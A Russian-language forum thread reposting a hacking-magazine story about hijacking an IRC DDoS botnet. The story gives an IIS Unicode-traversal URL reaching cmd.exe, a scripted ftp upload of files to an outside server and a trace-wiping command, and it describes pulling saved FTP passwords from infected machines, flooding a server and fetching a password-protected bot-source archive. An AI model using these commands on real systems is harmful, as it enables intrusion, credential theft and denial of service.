Одесса: 11°С (вода 9°С)
Киев: 3°С
Львов: 2°С

Тема: Интернет под угрозой военных ботов....

Ответить в теме
Показано с 1 по 10 из 10
  1. Вверх #1
    Посетитель Аватар для Zelin
    Пол
    Мужской
    Адрес
    одесса
    Сообщений
    352
    Репутация
    53

    По умолчанию Интернет под угрозой военных ботов....

    Нашумевшие истории крупных взломов

    Человеческая жизнь насыщена забавными вещами. Причем компьютерная жизнь тоже. Был случай, когда после сканирования одного сервера на наличие уязвимостей, взломщик наткнулся на нечто необычное... Это дало ему возможность взять под контроль тысячи серверов. Неожиданно? Несомненно! О том, как это произошло, я и расскажу.

    Лиха беда начало

    Все началось банально - кому-то по каким-то причинам не понравился какой-то сервер. От нечего делать взломщик, за спиной которого было порядка сотни порутанных систем, запустил свой любимый LANguard Scanner (http://www.gfisoftware.com/stats/ade...p?adv=58&loc=4). Через несколько минут программа показала хакеру около 80 живых адресов из сегмента просканенной сетки. Вяло перелистывая лог, взломщик начал понимать, что так просто тачку не взять, ибо бажных сервисов на ней не наблюдалось. Тогда наш герой решил осмотреть остальные адреса в сегменте. Тут-то и началось самое интересное...

    Беспорядочно тыкая в "плюсики" ЛАНгарда с целью просмотра баннеров каждого сервиса, хакер нашел живой ircd (демон ирки). Казалось бы, что тут такого? Людям свойственно общаться, и найти в инете живой ирк-сервак не составляет большого труда. Вот только вертелся он на порту 33333, и адрес сервера не был прописан в обратной зоне DNS (ip -> domain.name). Это показалось хакеру странным, поэтому он решил подцепиться к демону клиентом, чтобы узнать, на кой фиг, собственно, этот демон там нужен.

    Суем свой нос

    Через несколько мгновений наш герой уже сконнектился с этим загадочным ircd. По его баннеру он сразу догадался, что это был Unreal-ircd (для справки: Unreal всегда юзался в русской сети DalNetRU и имел огромное количество команд и всяких дополнительных примочек). После просмотра состояния сервера у хакера появилась мысль: "Я нашел огромную irc-сеть", потому как на сервере сидело без малого 2 тысячи юзеров (для сравнения: в самой крупной российской сети IRCNetRU в онлайне находится 2-3 тысячи человек). "Ну да ладно, посмотрим, чем тут народ занимается", - сказал себе взломщик и набрал /list. После этого у него отвисла челюсть - листинг показал всего один канал, на котором обитали те самые две тыщи пользователей. Ткнув по записи, хакер попал... да-да, хакер именно попал . В комнате тусили боты. Только боты и никого кроме ботов. Зачем кому-то понадобилось заводить столько искусственных экземпляров на один канал? Это удивило взломщика, и, зацепив свой любимый PsyBNC на этот сервер и врубив логирование канала, он решил подождать денек, чтобы понять смысл этой аномалии. Зашел он с рандомным ником и айдентом, т.к. не хотел выделяться из толпы .

    Ахтунг! Это враги!

    Как и предполагалось, через некоторое время в IRC пришел папка-админ. Для начала он заставил ботов узнать его . Чел кинул в канал странноватую строку вида "!start число", где число состояло из 40-50 цифр. После этого ВСЕ боты радостно поприветствовали своего хозяина! "Боже! Сколько флуда!" - прокричал хакер. Немного подождав, хозяин набрал команду "!udp ip-адрес". Смысл ее вполне ясен: указанный адрес в команде подвергся жесткому флуду по UDP протоколу. Теперь стало понято, что здесь происходит. Эти боты были созданы для проведения DDoS-атак. Но откуда были взяты несколько тысяч уязвимых серваков? Этот вопрос до сих пор оставался открытым.

    В поисках приключений

    Может быть, все не так сложно, как кажется на первый взгляд? С этими словами, наш герой хуизнул (/whois - команда в IRC, позволяющая узнать инфу о собеседнике ) бота, и решил немного просканить сервак, на котором он сидел. Его любимый сканер nmap показал, что на машине крутится винда с единственным открытым 80 портом (команда nmap -O ip-address позволяет определить версию операционки). Интуиция подсказывала, что IIS'ка, обслуживающая http, была дырявая. Набрав в Гугле "unicode bug", нарушитель сетевого порядка нашел ссылку на багтрак с описанием уязвимости. Там и находился эксплоит для бажных серверов (можно поизучать для общего развития - http://www.securityfocus.com/data/vu...nicodecheck.pl). Скачал, запустил с параметром адреса машины и получил положительный ответ: на серваке вертелась дырявая IIS. За ссылкой http://ip-address/msadc/..%c0%af../....cmd.exe?/c+dir c:\ хранился список файлов, находящихся в корне диска c:\. Рассказывать про Unicode-bug сейчас просто глупо, об этой уязвимости не раз упоминалось в нашем журнале, да и вообще инфу по этой ошибке можно найти на любом багтраке. Поэтому саму ошибку опустим, а лучше посмотрим, что же дальше делал взломщик.

    1. copy c:\winnt\system32\cmd.exe c:\cmd1.exe. Интерпретатор cmd.exe не позволит выполнить echo, если находится в родном каталоге.

    2. c:\cmd1.exe /c tasklist.

    Список процессов на удаленной машине выдал странноватый handle lb-1235.exe. За ним и скрывался вражеский бот. Хакер долго копался на сервере, перерыл множество каталогов и в конце концов нашел место обитания бота. Следующим его шагом был слив бота на FTP-сервер ftp.server.net. Это можно было выполнить двумя путями: командой tftp (ей требовалось наличие демона Trivial FTPD на NT-машине; доступа на такой сервер у хакера не было), либо обычной командой ftp без интерактивного режима (через сценарий). Взломщик выбрал второй вариант. Он шустренько набрал следующий блок команд:

    3. c:\cmd1.exe /c @echo open ftp.server.net > c:\ftp.ini

    c:\cmd1.exe /c @echo user ftp >> c:\ftp.ini

    c:\cmd1.exe /c @echo pass ftp >> c:\ftp.ini

    c:\cmd1.exe /c @echo put c:\winnt\deep-dir\with-bot.exe bot.exe >> c:\ftp.ini

    c:\cmd1.exe /c @echo bye >> c:\ftp.ini

    c:\cmd1.exe /c ftp -i -s:c:\ftp.ini

    Опция -i отключает все интерактивные вопросы, а параметру -s передается имя сценария.

    Сервер сдался. Он выполнил сценарий, загрузив бота на FTP-демон.

    4. c:\cmd1.exe /c del c:\ftp.ini c:\cmd1.exe - заметание следов.

    Анализ кода

    Слив военный экземпляр с сервера, хакер стал изучать бота. Как оказалось, он скачал обычный самораспаковывающийся архив. Чтобы ненароком не заразиться, взломщик переименовал расширение файла в .zip, и открыл его стандартным менеджером. Выяснилось, что бот был написан на mIRC-скриптах и активировался обычным мирком, окно которого затем скрывалось внешней программой. В самом архиве содержался mIRC, скрывалка окон, конфиг бота и около 10 скриптов, подгружавшихся в мирк при его запуске.

    Хакер открыл скрипт и был удивлен странным кодом. Дело в том, что программинг бота осуществлялся весьма нерационально и запутанно. Посидев с часок, он составил для себя небольшой список команд, при помощи которых можно проводить флуд-атаки. Разумеется, прежде чем передавать боту какие-либо команды, необходима была авторизация от ботмастера. Для это надо добиться выполнения трех условий:

    1) идент мастера должен быть cafeteam;

    2) мастеру нужен оп на канале;

    3) мастеру необходимо передать хеш, который каким-то образом дешифровал бот.

    Хакер очень заинтересовался этими ботами и захотел порулить ими на полную катушку (читай - за3.14DoSить несколько крупных серверов). Ему предстояло обмануть ботов по всем трем пунктам. Первое условие и условием-то трудно назвать - обычная смена идента. Как выполнить второе условие, взломщик также теоретически знал. Судя по коду, при передаче боту в приват строку !op "пароль", бот должен опнуть чела на канале.

    С третьим условием пришлось немного попотеть. Хакер нарыл в коде процедуру дешифровки хеша, но ему предстояло написать обратную процедуру, то есть функцию по составлению последовательности магических цифр. На кодинг этого самого модуля взломщик потратил 5 часов. Давай остановимся на алгоритме составления хеша (узнаем умные методы шифрования ).

    Зашифровал? Расшифровывай!

    Смысл шифрования заключался в следующем: бот просматривает полную маску чела, пусть это будет "[email protected]". Затем происходит порождение цикла по каждому символу этого хоста. Этот символ преобразуется в эквивалентный ему ASCII-код, который делится на текущую длину строки, а потом округляется. Затем происходит дозапись цифрового хеша в суммарную строку. Через определенное число символов происходит вставка в хеш некоторой посторонней цифры. Этот процесс повторяется до истечения длины полной маски. В завершение процедуры банальное сравнение. Если хеш, созданный ботом, совпал с последовательностью, переданной извне, то человек становится ботмастером, и боты переходят в его подчинение.

    После изнурительных тестов хакер написал обратную процедуру. Это давало возможность взять под контроль тысячи ботов. Кстати, последовательность посторонних цифр оказалось очень простой - 31337 . Теперь предстояло подконнектиться к серваку и протестить возможности ботов.

    Убедившись, что, кроме него самого, на ircd не было живых обитателей, хакер запросил у бота статус оператора. Затем передал заветный хеш и получил в ответ около тысячи приветствий . Как было сказано выше, у взломщика уже был список команд, одну из которых ты знаешь - !udp . Ее родимую он и протестил на одном серваке. Как и предполагалось, сервер стал недоступным в считанные секунды. Все бы хорошо, но хакер не знал, как остановить флуд . Из-за этого сервер поливался грязью аж целых 10 минут. Это время наш герой потратил на то, чтобы перерыть горы скриптов в поисках команды по отмену udp-флуда.

    Где же вы, пароли?

    Кроме команд, организующих атаку, были и другие, причем не менее интересные. Например, !find disk mask искал файл на заданном диске. Ничего умного в голову не лезло, поэтому хакер заставил всех ботов найти *.dat в каталоге c:\program files\ICQ . Машины, как правило, являлись рабочими станциями, поэтому поиски оказались пустыми. А вот пароли от FTP-серверов, хранящиеся в популярном менеджере Total Commander, можно было заюзать без особых проблем.

    После команды !find c:\winnt wcx_ftp.ini взломщик получил порядка десяти ссылок на указанный файл. Нет, ему совсем не нужно было вытягивать каждый ini’шник через Unicode-string. Боты были поразительно умны и понимали команду !get, переданную в приват. После нее бот передавал файл по DCC соединению. Таким образом, хакер вытянул десяток ini-файлов. В парочке из них находились довольно интересные FTP-сервера с сохраненными паролями. Если есть FTP-доступ, то, возможно, есть и SSH.

    Все пароли в TotalCMD шифруются по некоторому алгоритму. Расшифровывать их самому не было никакого желания, поэтому хакер поступил иначе. Он скачал программу recover (http://www.fomichev.ru/soft/crk/recover.zip). Эта чудо-прога была обычным аналогом известного Openpass - подсматривала пароль за астериксами (звездочками). Эти звездочки можно было найти, если открыть опции FTP-сессии, предварительно закинув wcx_ftp.ini в системный каталог.

    Бот улетел, но обещал вернуться!

    Через несколько дней нарушитель сетевого порядка знал все команды бота. Как оказалось, представители искусственного интеллекта умели бомбить ICQ через службу Pager, делать udp-флуд, а также tcp путем "бросания" больших пакетов в заданный порт жертвы. К тому же бот являлся червяком: он постоянно сканил указанные админом диапазоны адресов и искал на них уязвимые IIS. Если находил, то сразу же заливал копию себя через FTP-сервер, распаковывал и запускал эту самую копию. Процедура размножения занимала 30 Кб mIRC-кода.

    Кроме того, бот слушал порт, на котором располагался самописный баунсер. Конечно, возможности его были довольно ограниченны, но держать коннект он умел. В баунсере использовалась та же автономная авторизация, что и для бота-админа, только хеш посторонних цифр был другим . Хакеру удалось получить доступ и на баунсер. Одним словом, он взял под полный контроль вражеских ботов и управлял ими вплоть до их переезда на другой irc-сервер. После этого переезда его приключения с irc-ботами завершились.

    Этот материал приведен только в целях ознакомления и изучения основных действий хакера. Повторять трюки взломщика опасно для жизни - Старший Брат смотрит на тебя .


    Основные принципы начинающего хакера

    Что же помогло хакеру в его нелегком деле?

    1. Взломщик стремится к достижению своей цели любыми способами. Это видно из статьи: в одном случае он потратил на написание дешифрующей функции 5 часов, в другом - 5 минут на узнавание пароля от FTP-сессии.


    --------------------------------------------------------------------------------

    2. Ловкость рук и никакого мошенничества! Легко ли рыться в чужом коде и изучить его до последнего символа? Нелегко, но вполне возможно.

    Экземпляр военного бота

    Самих ботов можно скачать по ссылке http://www.phphost.ru/war-bot.zip. Но за ней скрывается запароленный архив, в котором лежат исходники бота, а также дешифратор. Пароль на этот архив подскажет последовательность символов "UGFzc3dkQm90" (без кавычек).


  2. Вверх #2
    Новичок
    Адрес
    Сухой лиман - FOReVER
    Сообщений
    28
    Репутация
    10
    У меня ссылка не открывается! Почему?
    :) Каждому радиолюбителю - по радиолюбительнице!!! :)

  3. Вверх #3
    Посетитель Аватар для Bewza
    Пол
    Мужской
    Адрес
    Город, которого нет...
    Возраст
    31
    Сообщений
    344
    Репутация
    28
    Троян или вирус, даже закачивать не буду.
    Что случилось однажды, может никогда больше не случиться. Но то, что случилось два раза, непременно случится и в третий.

  4. Вверх #4
    Zelin,

    Тебя не подзаеб... это всё печаткать????? Ты наверно освоил кнопку копировать и спер это с какого то сервака юных имбицильных хаккеров
    Браво.....
    Не мы такие, жизнь такая...

  5. Вверх #5
    Посетитель Аватар для Zelin
    Пол
    Мужской
    Адрес
    одесса
    Сообщений
    352
    Репутация
    53
    Цитата Сообщение от -=GDS=-
    Zelin,

    Тебя не подзаеб... это всё печаткать????? Ты наверно освоил кнопку копировать и спер это с какого то сервака юных имбицильных хаккеров
    Браво.....

    А для чево ещё форум???
    Ну не толкать же говнотёрки всюду...
    На мой взгляд прикольная статья в тему "интернет"

  6. Вверх #6
    Посетитель Аватар для Zelin
    Пол
    Мужской
    Адрес
    одесса
    Сообщений
    352
    Репутация
    53
    Цитата Сообщение от Михрюня
    У меня ссылка не открывается! Почему?

    http://www.heeter.net/warlords/warbot/
    http://www.neocroncentral.net/databa...0559621372.php
    http://forum.neocron.com/showthread.php?t=92816

  7. Вверх #7
    Zelin,

    Не правы вы батенька....Ох как не правы... :twisted:
    Не мы такие, жизнь такая...

  8. Вверх #8
    Вот дурдом Веселка....))))
    [color=blue]Жизнь как пустой стакан, иногда надо наполнять.... [/color]

  9. Вверх #9
    в "Хакере" была эта статья
    icq#523333
    Строгость украинских законов смягчается необязательностью их исполнения.

  10. Вверх #10
    Живёт на форуме Аватар для Ruslan.V.
    Пол
    Мужской
    Адрес
    Odessa, Ukraine, Ukraine
    Возраст
    28
    Сообщений
    4,366
    Репутация
    71
    это и есть из хакера, надо было внимательнее читать

    Рассказывать про Unicode-bug сейчас просто глупо, об этой уязвимости не раз упоминалось в нашем журнале,


Ответить в теме

Социальные закладки

Социальные закладки

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения